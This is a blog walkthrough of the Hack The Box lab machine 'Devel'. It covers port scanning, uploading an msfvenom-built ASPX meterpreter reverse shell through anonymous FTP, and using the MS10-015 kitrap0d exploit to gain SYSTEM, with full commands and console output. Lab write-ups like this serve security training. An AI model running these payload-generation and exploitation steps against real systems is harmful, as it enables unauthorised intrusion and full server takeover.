Ech0's Blog

Ech0 - 10 / 11 / 19

Devel Writeup

Introduction :



Devel was an easy Windows box released back in March 2017.

Part 1 : Initial Enumeration



As always we begin our Enumeration using Nmap to enumerate opened ports.
We will be using the flags -sC for default scripts and -sV to enumerate versions.

  λ ech0 [~] → nmap -sC -sV 10.10.10.5
  Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-10 11:42 CET
  Nmap scan report for 10.10.10.5
  Host is up (0.039s latency).
  Not shown: 998 filtered ports
  PORT   STATE SERVICE VERSION
  21/tcp open  ftp     Microsoft ftpd
  | ftp-anon: Anonymous FTP login allowed (FTP code 230)
  | 03-18-17  01:06AM       <DIR>          aspnet_client
  | 03-17-17  04:37PM                  689 iisstart.htm
  |_03-17-17  04:37PM               184946 welcome.png
  | ftp-syst:
  |_  SYST: Windows_NT
  80/tcp open  http    Microsoft IIS httpd 7.5
  | http-methods:
  |_  Potentially risky methods: TRACE
  |_http-server-header: Microsoft-IIS/7.5
  |_http-title: IIS7
  Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

  Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  Nmap done: 1 IP address (1 host up) scanned in 13.45 seconds

We see that port 21 is opened, and giving us a ftp service that allows anonymous connections to work with.

Part 2 : Getting User Access



The first step is to check if we can download and upload files on the FTP service since it should allow us to be connected as an anonymous user.

  λ ech0 [~] → ftp 10.10.10.5
  Connected to 10.10.10.5.
  220 Microsoft FTP Service
  Name (10.10.10.5:ech0): anonymous
  331 Anonymous access allowed, send identity (e-mail name) as password.
  Password:
  230 User logged in.
  Remote system type is Windows_NT.

  ftp> dir
  200 PORT command successful.
  125 Data connection already open; Transfer starting.
  03-18-17  01:06AM       IR>          aspnet_client
  03-17-17  04:37PM                  689 iisstart.htm
  03-17-17  04:37PM               184946 welcome.png
  226 Transfer complete.

Now let's see if we can download files and upload files. 

  ftp> dir
  200 PORT command successful.
  125 Data connection already open; Transfer starting.
  03-18-17  01:06AM       R>          aspnet_client
  03-17-17  04:37PM                  689 iisstart.htm
  03-17-17  04:37PM               184946 welcome.png
  226 Transfer complete.

  ftp> get welcome.png
  200 PORT command successful.
  125 Data connection already open; Transfer starting.
  WARNING! 820 bare linefeeds received in ASCII mode
  File may not have transferred correctly.
  226 Transfer complete.
  184946 bytes received in 0.285 seconds (634 kbytes/s)

  ftp> put ech0.html
  200 PORT command successful.
  125 Data connection already open; Transfer starting.
  226 Transfer complete.
  16 bytes sent in 0.000144 seconds (109 kbytes/s)

We have been able to download welcome.png, and upload ech0.html, let's see if we can browse to our uploaded webpage.

As shown above, we have successfully uploaded our webpage, and browsed to it. now let's try to upload a reverse shell and browse to it.

To generate the payload named ech0.aspx, we will be using msfvenom with the -p, LHOST, LPORT and -f flags.
We will be using our terminal with the according metasploit module to recieve the meterpreter connection.

Terminal n°1:

  λ ech0 [~/_HTB/Devel] → msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=9001 -f aspx > ech0.aspx
  [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
  [-] No arch selected, selecting arch: x86 from the payload
  No encoder or badchars specified, outputting raw payload
  Payload size: 341 bytes
  Final size of aspx file: 2824 bytes

  λ ech0 [~/_HTB/Devel] → msfconsole

  msf5 > use exploit/multi/handler

  msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
  payload => windows/meterpreter/reverse_tcp

  msf5 exploit(multi/handler) > set LHOST 10.10.14.48
  LHOST => 10.10.14.48

  msf5 exploit(multi/handler) > set LPORT 9001
  LPORT => 9001

  msf5 exploit(multi/handler) > show options

  Module options (exploit/multi/handler):

     Name  Current Setting  Required  Description
     ----  ---------------  --------  -----------


  Payload options (windows/meterpreter/reverse_tcp):

     Name      Current Setting  Required  Description
     ----      ---------------  --------  -----------
     EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
     LHOST     10.10.14.48      yes       The listen address (an interface may be specified)
     LPORT     9001             yes       The listen port


  Exploit target:

     Id  Name
     --  ----
     0   Wildcard Target

our first terminal is ready to recieve the connection, now we will upload the ech0.aspx payload, and browse to it, and we'll see if we can get our meterpreter shell.

Terminal n°2: 

  λ ech0 [~/_HTB/Devel] → ftp 10.10.10.5

  Connected to 10.10.10.5.
  220 Microsoft FTP Service
  Name (10.10.10.5:ech0): anonymous
  331 Anonymous access allowed, send identity (e-mail name) as password.
  Password:
  230 User logged in.
  Remote system type is Windows_NT.

  ftp> put ech0.aspx
  200 PORT command successful.
  125 Data connection already open; Transfer starting.
  226 Transfer complete.
  2860 bytes sent in 0.000315 seconds (8.66 Mbytes/s)
  ftp>



Terminal n°1:

  msf5 exploit(multi/handler) > exploit

  [*] Started reverse TCP handler on 10.10.14.48:9001
  [*] Sending stage (180291 bytes) to 10.10.10.5
  [*] Meterpreter session 1 opened (10.10.14.48:9001 -> 10.10.10.5:49158) at 2019-11-10 13:55:18 +0100

  meterpreter > getuid
  Server username: IIS APPPOOL\Web

  meterpreter > background
  [*] Backgrounding session 1...

We recieved our meterpreter session back, now we need to escalate privileges.
First of all we background our meterpreter session, so that we can use the ms10_015 exploit named kitrap0d

  meterpreter > background
  [*] Backgrounding session 1...
  msf5 exploit(multi/handler) >

  msf5 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d

  msf5 exploit(windows/local/ms10_015_kitrap0d) > set session 1
  session => 1

  msf5 exploit(windows/local/ms10_015_kitrap0d) > set lhost 10.10.14.48
  lhost => 10.10.14.48

  msf5 exploit(windows/local/ms10_015_kitrap0d) > set lport 9002
  lport => 9002

  msf5 exploit(windows/local/ms10_015_kitrap0d) > exploit

  [*] Started reverse TCP handler on 192.168.0.23:9002
  [*] Launching notepad to host the exploit...
  [+] Process 3372 launched.
  [*] Reflectively injecting the exploit DLL into 3372...
  [*] Injecting exploit into 3372 ...
  [*] Exploit injected. Injecting payload into 3372...
  [*] Payload injected. Executing exploit...
  [+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
  [*] Sending stage (179779 bytes) to 10.10.10.5
  [*] Meterpreter session 2 opened (10.10.14.48:9002 -> 10.10.10.5:49159) at 2019-11-10 14:04:56 -0500

  meterpreter > getuid
  Server username: NT AUTHORITY\SYSTEM

Our exploit worked! It returned with an elevated privileges shell.
Now all that is left to do is grabbing the user and root flags.

Part 3 : The Root Access



The user flag is located in C:\User\babis\Desktop
The root flag is located in C:\Users\Administrator\Desktop

c:\Users\babis\Desktop>type user.txt
type user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

c:\Users\Administrator\Desktop>type root.txt
type root.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

And that's it ! we grabbed both the user and root flags.

Conclusion



Here we can see the progress graph :